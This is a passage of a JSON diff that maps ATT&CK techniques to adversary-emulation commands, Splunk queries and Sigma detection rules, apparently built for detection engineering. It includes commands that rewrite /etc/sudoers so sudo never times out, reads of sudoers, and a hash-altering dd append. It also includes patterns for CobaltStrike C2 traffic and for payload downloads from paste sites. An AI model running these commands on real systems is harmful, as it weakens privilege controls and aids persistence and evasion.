welcome.sh >before", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "dd if=/dev/zero bs=1 count=1 >> welcome.sh", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "<<", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1+0 records in", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1+0 records out", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1 byte (1 B) copied, 0.000221464 s, 4.5 kB/s", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": ">>", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sha1sum welcome.sh >after", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cmp before after", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "<>", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "```index=linux sourcetype=\"bash_history\" bash_command=\"dd *\"```", + "name": "" + }, + { + "product": "Splunk", + "query": "", + "name": "" + } + ], + "possible_detections": [ + "```bash_history logs```", + { + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Code integrity failures may indicate tampered executables.", + "author": "Thomas Patzke", + "tags": [ + "attack.defense_evasion", + "attack.t1009" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 5038, + 6281 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Disk device errors" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + ] + }, + { + "technique_id": "T1222", + "command_list": [ + "```", + "chmod 766 test1.txt", + "chmod u+x test1.txt", + "chmod o-x test1.txt", + "chown ec2-user:ec2-user test1.txt" + ], + "commands": [ + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod 766 test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod u+x test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod o-x test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chown ec2-user:ec2-user test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=90 OR syscall=91 OR sycall=268 | table msg,syscall,syscall_name,success,auid,comm,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=92 OR syscall=93 OR syscall=94 OR syscall=260 comm!=splunkd | table", + "name": "" + }, + { + "product": "Splunk", + "query": "msg,syscall,syscall_name,success,auid,comm,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F auid>=1000 -F auid!=-1 -F key=perm_mod", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S chown,fchown,lchown,fchownat -F auid>=1000 -F auid!=-1 -F key=perm_mod", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"chmod *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"chown *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1169", + "command_list": [ + "cat /etc/sudoers", + "vim /etc/sudoers" + ], + "commands": [ + { + "command": "cat /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "vim /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" sudoers_change", + "name": "" + }, + { + "product": "Splunk", + "query": "Audit Rule : -w /etc/sudoers -p wa -k sudoers_change", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "action": "global", + "title": "Sudo Privilege Escalation CVE-2019-14287", + "id": "f74107df-b6c6-4e80-bf00-4170b658162b", + "status": "experimental", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "references": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546" + ], + "author": "Florian Roth", + "date": "2019/10/15", + "modified": "2019/10/20", + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1169" + ], + "logsource": { + "product": "linux" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "detection": { + "selection_keywords": [ + "* -u#*" + ], + "condition": "selection_keywords" + } + }, + { + "detection": { + "selection_user": { + "USER": [ + "#-*", + "#*4294967295" + ] + }, + "condition": "selection_user" + } + } + ], + "external_reference": [] + }, + { + "technique_id": "T1206", + "command_list": [ + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"" + ], + "commands": [ + { + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" sudoers_change", + "name": "" + }, + { + "product": "Splunk", + "query": "Audit Rule : -w /etc/sudoers -p wa -k sudoers_change", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1071", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "DNS TXT Answer with possible execution strings", + "id": "8ae51330-899c-4641-8125-e39f2e07da72", + "status": "experimental", + "description": "Detects strings used in command execution in DNS TXT Answer", + "references": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1" + ], + "tags": [ + "attack.t1071" + ], + "author": "Markus Neis", + "date": "2018/08/08", + "logsource": { + "category": "dns" + }, + "detection": { + "selection": { + "record_type": "TXT", + "answer": [ + "*IEX*", + "*Invoke-Expression*", + "*cmd.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.group-ib.com/blog/cobalt", + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + null + ] + }, + { + "technique_id": "T1102", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "CobaltStrike Malleable Amazon browsing traffic profile", + "id": "953b895e-5cc9-454b-b183-7f3db555452e", + "status": "experimental", + "description": "Detects Malleable Amazon Profile", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection1": { + "c-useragent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "cs-method": "GET", + "c-uri": "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books", + "cs-host": "www.amazon.com", + "cs-cookie": "*=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996" + }, + "selection2": { + "c-useragent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "cs-method": "POST", + "c-uri": "/N4215/adj/amzn.us.sr.aps", + "cs-host": "www.amazon.com" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "CobaltStrike Malleable (OCSP) Profile", + "id": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "status": "experimental", + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "c-uri": "*/oscp/*", + "cs-host": "ocsp.verisign.com" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "CobaltStrike Malleable OneDrive browsing traffic profile", + "id": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "status": "experimental", + "description": "Detects Malleable OneDrive Profile", + "references": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile" + ], + "author": "Markus Neis", + "tags": [ + "attack.t1102" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "cs-method": "GET", + "c-uri": "*?manifest=wac", + "cs-host": "onedrive.live.com" + }, + "filter": { + "c-uri": "http*://onedrive.live.com/*" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Raw Paste Service Access", + "id": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "status": "experimental", + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "references": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations" + ], + "author": "Florian Roth", + "date": "2019/12/05", + "tags": [ + "attack.t1102", + "attack.defense_evasion" + ], + "logsource": { + "category": "proxy" + }, + "detection": { + "selection": { + "c-uri|contains": [ + ".paste.ee/r/", + ".pastebin.com/raw/", + ".hastebin.com/raw/" + ] + }, + "condition": "selection" + }, + "fields": [ + "ClientIP", + "c-uri", + "c-useragent" + ], + "falsepositives": [ + "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "level": "high" + }, + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + 